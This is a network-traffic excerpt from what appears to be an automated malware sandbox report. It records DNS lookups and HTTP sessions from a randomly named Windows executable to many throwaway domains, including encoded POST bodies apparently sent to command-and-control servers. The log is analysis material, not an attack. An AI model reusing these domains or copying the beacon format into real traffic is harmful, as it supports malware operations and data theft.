                                                                                                                                                Nov 25, 2024 09:45:18.890425920 CET192.168.2.41.1.1.10x9ec6Standard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:19.904392004 CET192.168.2.41.1.1.10x9ec6Standard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:35.561322927 CET192.168.2.41.1.1.10x8f84Standard query (0)www.carsten.studioA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:50.827177048 CET192.168.2.41.1.1.10x2cfdStandard query (0)www.cssa.auctionA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:51.824491024 CET192.168.2.41.1.1.10x2cfdStandard query (0)www.cssa.auctionA (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:46:07.217420101 CET192.168.2.41.1.1.10x32a1Standard query (0)www.dietcoffee.onlineA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Nov 25, 2024 09:42:29.186005116 CET1.1.1.1192.168.2.40x1573No error (0)www.airrelax.shop104.21.16.206A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:42:29.186005116 CET1.1.1.1192.168.2.40x1573No error (0)www.airrelax.shop172.67.215.235A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:42:46.582037926 CET1.1.1.1192.168.2.40x8849No error (0)www.amayavp.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:02.028917074 CET1.1.1.1192.168.2.40x6db2No error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:02.028917074 CET1.1.1.1192.168.2.40x6db2No error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:17.385299921 CET1.1.1.1192.168.2.40xfe52No error (0)www.127358.win206.238.89.119A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:33.367620945 CET1.1.1.1192.168.2.40x6a92No error (0)www.caj-bioteaque.online212.123.41.108A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:33.490792990 CET1.1.1.1192.168.2.40x6a92No error (0)www.caj-bioteaque.online212.123.41.108A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:48.600311041 CET1.1.1.1192.168.2.40x2fbeNo error (0)www.ssrpidemt-soar.sbs172.67.223.206A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:43:48.600311041 CET1.1.1.1192.168.2.40x2fbeNo error (0)www.ssrpidemt-soar.sbs104.21.70.134A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:44:03.657198906 CET1.1.1.1192.168.2.40x2517No error (0)www.izmirescortg.xyz172.67.186.192A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:44:03.657198906 CET1.1.1.1192.168.2.40x2517No error (0)www.izmirescortg.xyz104.21.36.62A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:44:18.848118067 CET1.1.1.1192.168.2.40x8fc2No error (0)www.030002613.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:44:34.100106001 CET1.1.1.1192.168.2.40xace2No error (0)www.327531.buzz43.199.54.158A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:44:49.232960939 CET1.1.1.1192.168.2.40x5b9dNo error (0)www.urbanfashion.website209.74.77.108A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:04.441714048 CET1.1.1.1192.168.2.40x86eNo error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:20.743444920 CET1.1.1.1192.168.2.40x9ec6No error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:20.743462086 CET1.1.1.1192.168.2.40x9ec6No error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:36.210143089 CET1.1.1.1192.168.2.40x8f84No error (0)www.carsten.studiocarsten.studioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:36.210143089 CET1.1.1.1192.168.2.40x8f84No error (0)carsten.studio217.160.0.200A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:52.082026005 CET1.1.1.1192.168.2.40x2cfdNo error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:52.082026005 CET1.1.1.1192.168.2.40x2cfdNo error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:52.082050085 CET1.1.1.1192.168.2.40x2cfdNo error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:45:52.082050085 CET1.1.1.1192.168.2.40x2cfdNo error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                                                                                                                Nov 25, 2024 09:46:07.965703964 CET1.1.1.1192.168.2.40x32a1No error (0)www.dietcoffee.online77.68.64.45A (IP address)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • www.airrelax.shop
                                                                                                                                                • www.amayavp.xyz
                                                                                                                                                • www.bpgroup.site
                                                                                                                                                • www.127358.win
                                                                                                                                                • www.caj-bioteaque.online
                                                                                                                                                • www.ssrpidemt-soar.sbs
                                                                                                                                                • www.izmirescortg.xyz
                                                                                                                                                • www.030002613.xyz
                                                                                                                                                • www.327531.buzz
                                                                                                                                                • www.urbanfashion.website
                                                                                                                                                • www.canadavinreport.site
                                                                                                                                                • www.sankan-fukushi.info
                                                                                                                                                • www.carsten.studio
                                                                                                                                                • www.cssa.auction

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.449741104.21.16.206803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:42:29.323622942 CET517OUTGET /wq47/?ifzt=+qWmsYvD7OMlDEAEm/jaBDQSW8n+pKrv9iKIE2pdq1tK+kqvSnJEJbP2DMl6xw9oMdRXFlgn6DbTeTaaAs/qgaat4XAxW5JpuJNECjkmcyUCSAd0ff+SBDY=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.airrelax.shop
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:42:30.625463963 CET1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 25 Nov 2024 08:42:30 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Last-Modified: Fri, 25 Oct 2024 07:07:09 GMT
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDVetU28pvZ34yHvxpWXSkTDrLK3GZY4KTcvrekEZG6yjfLNdbj2Uh03XrTe6i%2B27H4n49ja8Ogi1Rdb6chgfSukWlb8GlKvcL1Yvr%2Bkx55u9rn4ZQlfum6oUCKyIu8VGNphQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e8058833c2c0f4d-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1545&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=517&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Data Raw: 35 36 62 38 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 09 09 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 [TRUNCATED]
                                                                                                                                                Data Ascii: 56b8<html lang=""><head><meta charset="utf-8"><meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cove" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="icon" href="favicon.ico"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="yes" name="apple-touch-fullscreen"><title>actionarena.top: Where
                                                                                                                                                Nov 25, 2024 09:42:30.625514984 CET1236INData Raw: 68 61 70 70 69 6e 65 73 73 20 6d 65 65 74 73 20 69 6e 6e 6f 76 61 74 69 6f 6e 20 7c 20 4f 6e 6c 69 6e 65 20 47 61 6d 65 20 7c 20 46 72 65 65 20 47 61 6d 65 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 63 68 75 6e
                                                                                                                                                Data Ascii: happiness meets innovation | Online Game | Free Game</title><link href="css/chunk-common.2627b58b.css" rel="preload" as="style"><link href="css/chunk-vendors.df919975.css" rel="preload" as="style"><link href="css/chunk-vendors.df919975.c
                                                                                                                                                Nov 25, 2024 09:42:30.625550032 CET1236INData Raw: 75 62 61 64 73 28 29 2e 65 6e 61 62 6c 65 53 69 6e 67 6c 65 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 74 61 67 2e 65 6e 61 62 6c 65 53 65 72 76 69 63 65 73 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b
                                                                                                                                                Data Ascii: ubads().enableSingleRequest(); googletag.enableServices(); }); </script> adEnd--><script>window.aiptag = window.aiptag || {cmd: []};aiptag.cmd.display = aiptag.cmd.display || [];aiptag.cmd.player = aiptag
                                                                                                                                                Nov 25, 2024 09:42:30.625586987 CET1236INData Raw: 6c 61 79 65 72 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 0a 09 09 09 09 61 69 70 74 61 67 2e 63 6d 64 2e 70 6c 61 79 65 72 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 61 69 70 74 61 67 2e 61 64 70 6c 61 79 65 72 2e 73
                                                                                                                                                Data Ascii: layer !== 'undefined') {aiptag.cmd.player.push(function() { aiptag.adplayer.startVideoAd(); });} else {//Adlib didnt load this could be due to an adblocker, timeout etc.//Please add your script here that starts the content,
                                                                                                                                                Nov 25, 2024 09:42:30.625618935 CET1236INData Raw: 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 61 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 68 72 65 66 3d 22 73 65 61 72 63 68 2e 68 74 6d 6c 3f 74 79 70 65 3d 50 6f 70 75 6c 61 72 22 20 63 6c 61 73 73 3d 22
                                                                                                                                                Data Ascii: </div></a><a data-v-49759819="" href="search.html?type=Popular" class="type_item" style="display: none;"></a><a data-v-49759819="" href="search.html?type=Girls" class="type_item"><div data-v-49759819=""><img data-
                                                                                                                                                Nov 25, 2024 09:42:30.625691891 CET1236INData Raw: 69 74 65 6d 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 61 6c 74 3d 22 22 20 73 72 63 3d 22 69 6d 67 2f 72
                                                                                                                                                Data Ascii: item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img/racing.1bfb9b83.png" data-src="img/racing.1bfb9b83.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class="item_name">Racin
                                                                                                                                                Nov 25, 2024 09:42:30.625726938 CET1236INData Raw: 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 69 74 65 6d 5f 6e 61 6d 65 22 3e 0a 09 09 09 09 09 09 53 70 6f 72 74 73 0a 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 61 20
                                                                                                                                                Data Ascii: 49759819="" class="item_name">Sports</span></div></a><a data-v-49759819="" href="search.html?type=Action" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img/action.6b95a5ff.pn
                                                                                                                                                Nov 25, 2024 09:42:30.625761986 CET1236INData Raw: 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22 3e 0a 09 09 09 09 09 3c 73 76 67 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 74 3d 22 31 36 38 37 32 34 34 32 32 32 39 33 35 22
                                                                                                                                                Data Ascii: iv data-v-49759819="" class="menu"><svg data-v-49759819="" t="1687244222935" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="19883" xmlns:xlink="http://www.w3.org/1999/xlink"width="1.8rem" heig
                                                                                                                                                Nov 25, 2024 09:42:30.625797033 CET1236INData Raw: 72 65 66 3d 22 73 65 61 72 63 68 2e 68 74 6d 6c 3f 71 3d 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 22 3e 0a 09 09 09 09 09 3c 73 76 67 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 74 3d 22 31 36 38 37 32 34 34 35 35 30 39 31 31
                                                                                                                                                Data Ascii: ref="search.html?q=" class="search"><svg data-v-49759819="" t="1687244550911" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="3078" data-spm-anchor-id="a313x.7781069.0.i2"xmlns:xlink="http://ww
                                                                                                                                                Nov 25, 2024 09:42:30.625833035 CET1236INData Raw: 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 69 6e 70 75 74 20 74 68 65 20 6b 65 79 77 6f 72 64 73 22 20 63 6c 65 61 72 61 62 6c 65 3d 22 22 20 64 65 66 61 75 6c 74 76 61 6c 75 65 3d 22 22 3e 0a 09 09 09 09 3c 64 69 76 20
                                                                                                                                                Data Ascii: pe="text" placeholder="input the keywords" clearable="" defaultvalue=""><div data-v-0544793f=""><svg data-v-0544793f="" t="1680079992751" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="15827" wi
                                                                                                                                                Nov 25, 2024 09:42:30.745532036 CET1236INData Raw: 64 2d 2d 3e 0a 09 09 09 09 09 3c 64 69 76 20 69 64 3d 27 61 63 74 69 6f 6e 61 72 65 6e 61 2d 74 6f 70 5f 33 30 30 78 32 35 30 27 3e 0a 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a
                                                                                                                                                Data Ascii: d--><div id='actionarena-top_300x250'><script type='text/javascript'>aiptag.cmd.display.push(function() { aipDisplayTag.display('actionarena-top_300x250'); });</script></div><div ><div class="top_


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.449742185.27.134.144803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:42:46.719499111 CET777OUTPOST /572a/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.amayavp.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.amayavp.xyz
                                                                                                                                                Referer: http://www.amayavp.xyz/572a/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 73 78 58 41 43 63 68 72 38 46 30 69 35 31 4c 69 4e 32 4c 4c 41 47 63 50 6c 54 53 56 72 76 75 6b 41 71 37 6d 4c 78 59 6e 6a 45 55 65 34 48 32 61 32 78 39 57 7a 54 6e 31 59 68 2b 33 65 37 64 38 46 72 7a 53 4b 54 61 4b 58 33 48 53 64 54 65 6a 4b 44 69 61 6c 4e 77 5a 6c 73 47 72 62 36 2f 35 72 47 32 48 59 41 50 30 52 74 74 4c 48 78 30 6c 65 63 50 6d 52 64 62 55 4d 6c 77 4c 67 76 2f 42 56 66 49 48 37 5a 4b 4d 42 48 6b 4d 6f 75 6d 35 43 51 77 49 49 4f 38 4a 57 56 58 74 41 78 48 50 52 67 38 45 68 42 45 47 4f 57 58 6f 34 51 75 2b 56 36 75 62 50 32 65 37 64 36 43 64 67 31 52 52 41 77 3d 3d
                                                                                                                                                Data Ascii: ifzt=sxXACchr8F0i51LiN2LLAGcPlTSVrvukAq7mLxYnjEUe4H2a2x9WzTn1Yh+3e7d8FrzSKTaKX3HSdTejKDialNwZlsGrb6/5rG2HYAP0RttLHx0lecPmRdbUMlwLgv/BVfIH7ZKMBHkMoum5CQwIIO8JWVXtAxHPRg8EhBEGOWXo4Qu+V6ubP2e7d6Cdg1RRAw==
                                                                                                                                                Nov 25, 2024 09:42:48.000629902 CET683INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:42:47 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br
                                                                                                                                                Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 97 3a 9d 56 9d 4a d6 59 36 4b b1 e2 bc 4b 3c 35 5b f1 45 41 2c 0d 9c 13 75 a2 53 8d 6c f0 cd 92 13 07 3c e1 f2 a8 9b 1d ec a0 b7 b9 66 cf fe 04 a9 07 c7 dc 1a 81 74 49 60 9a 4e 0f b5 1a 01 fc a4 a2 3d c3 64 82 6e 15 0f 57 94 34 9d e4 c6 4c f9 66 2e 65 3d c3 c8 59 05 16 e0 94 83 d7 f7 da fa 21 93 04 71 cc 92 1e 37 82 54 19 e7 0e 1c 96 b4 e5 99 64 ec 1f e2 be fb 9f 22 71 e7 f6 01 fb 85 6b c5 c2 eb 3b b7 90 01 ec 1a 4d eb fa f1 b1 14 8a fe d2 df d3 bf 98 2d 01 ce 97 4b fc 3e d5 e1 db 82 79 ee 80 52 ee 21 ad 7d c7 be 6f 7b ed c3 90 b9 10 82 4c 36 f6 d5 bf 9f d2 94 b6 29 65 e1 c5 c5 04 1a 04 99 5c 76 d9 1b 12 fb 5f 6f 0f 01 a0 ff a0 5e 0a a1 51 d9 54 61 96 e5 b6 54 b2 32 b2 10 2d 65 b5 50 a9 2e 29 e3 da e6 b5 aa 8a b2 34 b9 73 ae 92 a6 50 aa ac 54 2a 54 2e 2a a1 4b e5 ab 74 80 cc e3 54 5a 83 5a f8 4a 95 b9 13 68 4a 34 69 2a 64 89 ca 3b 54 da 8f b8 b6 33 b3 6d f4 04 30 05 f4 f3 73 ed 56 6b a0 21 d2 10 c1 ce 9f 5f bf c4 d6 99 e5 f7 7c 1d 18 9e 73 e4 9a b1 90 d6 24 32 3f 84 6e [TRUNCATED]
                                                                                                                                                Data Ascii: 1b9 :VJY6KK<5[EA,uSl<ftI`N=dnW4Lf.e=Y!q7Td"qk;M-K>yR!}o{L6)e\v_o^QTaT2-eP.)4sPT*T.*KtTZZJhJ4i*d;T3m0sVk!_|s$2?nIEWDEE[[up'yID+t}Ps_(eGQIKL#J-f"WeJrF$|0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.449743185.27.134.144803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:42:49.382522106 CET797OUTPOST /572a/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.amayavp.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.amayavp.xyz
                                                                                                                                                Referer: http://www.amayavp.xyz/572a/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 73 78 58 41 43 63 68 72 38 46 30 69 35 56 62 69 65 68 6e 4c 49 47 63 4f 67 54 53 56 79 66 75 67 41 71 48 6d 4c 30 6f 33 2f 68 6b 65 39 56 65 61 78 79 6c 57 77 54 6e 31 41 52 2b 79 54 62 64 4a 46 72 2f 61 4b 57 61 4b 58 7a 6e 53 64 53 75 6a 4e 77 4b 5a 6b 64 77 4d 38 38 47 74 44 61 2f 35 72 47 32 48 59 41 61 52 52 74 6c 4c 48 41 45 6c 65 39 4f 55 51 64 62 54 45 46 77 4c 78 2f 2f 46 56 66 4a 69 37 64 4b 6d 42 45 63 4d 6f 73 2b 35 43 46 63 4a 52 2b 38 50 59 31 57 64 42 69 75 6b 58 77 74 55 70 52 73 55 4a 6d 53 46 35 57 6a 6b 45 4c 50 4d 64 32 36 49 41 39 4c 70 74 32 73 59 62 78 69 4f 64 78 2f 4d 53 51 34 56 44 6f 42 51 67 50 63 56 33 58 38 3d
                                                                                                                                                Data Ascii: ifzt=sxXACchr8F0i5VbiehnLIGcOgTSVyfugAqHmL0o3/hke9VeaxylWwTn1AR+yTbdJFr/aKWaKXznSdSujNwKZkdwM88GtDa/5rG2HYAaRRtlLHAEle9OUQdbTEFwLx//FVfJi7dKmBEcMos+5CFcJR+8PY1WdBiukXwtUpRsUJmSF5WjkELPMd26IA9Lpt2sYbxiOdx/MSQ4VDoBQgPcV3X8=
                                                                                                                                                Nov 25, 2024 09:42:50.708312035 CET683INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:42:50 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br
                                                                                                                                                Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 97 3a 9d 56 9d 4a d6 59 36 4b b1 e2 bc 4b 3c 35 5b f1 45 41 2c 0d 9c 13 75 a2 53 8d 6c f0 cd 92 13 07 3c e1 f2 a8 9b 1d ec a0 b7 b9 66 cf fe 04 a9 07 c7 dc 1a 81 74 49 60 9a 4e 0f b5 1a 01 fc a4 a2 3d c3 64 82 6e 15 0f 57 94 34 9d e4 c6 4c f9 66 2e 65 3d c3 c8 59 05 16 e0 94 83 d7 f7 da fa 21 93 04 71 cc 92 1e 37 82 54 19 e7 0e 1c 96 b4 e5 99 64 ec 1f e2 be fb 9f 22 71 e7 f6 01 fb 85 6b c5 c2 eb 3b b7 90 01 ec 1a 4d eb fa f1 b1 14 8a fe d2 df d3 bf 98 2d 01 ce 97 4b fc 3e d5 e1 db 82 79 ee 80 52 ee 21 ad 7d c7 be 6f 7b ed c3 90 b9 10 82 4c 36 f6 d5 bf 9f d2 94 b6 29 65 e1 c5 c5 04 1a 04 99 5c 76 d9 1b 12 fb 5f 6f 0f 01 a0 ff a0 5e 0a a1 51 d9 54 61 96 e5 b6 54 b2 32 b2 10 2d 65 b5 50 a9 2e 29 e3 da e6 b5 aa 8a b2 34 b9 73 ae 92 a6 50 aa ac 54 2a 54 2e 2a a1 4b e5 ab 74 80 cc e3 54 5a 83 5a f8 4a 95 b9 13 68 4a 34 69 2a 64 89 ca 3b 54 da 8f b8 b6 33 b3 6d f4 04 30 05 f4 f3 73 ed 56 6b a0 21 d2 10 c1 ce 9f 5f bf c4 d6 99 e5 f7 7c 1d 18 9e 73 e4 9a b1 90 d6 24 32 3f 84 6e [TRUNCATED]
                                                                                                                                                Data Ascii: 1b9 :VJY6KK<5[EA,uSl<ftI`N=dnW4Lf.e=Y!q7Td"qk;M-K>yR!}o{L6)e\v_o^QTaT2-eP.)4sPT*T.*KtTZZJhJ4i*d;T3m0sVk!_|s$2?nIEWDEE[[up'yID+t}Ps_(eGQIKL#J-f"WeJrF$|0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.449744185.27.134.144803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:42:52.039318085 CET10879OUTPOST /572a/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.amayavp.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.amayavp.xyz
                                                                                                                                                Referer: http://www.amayavp.xyz/572a/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
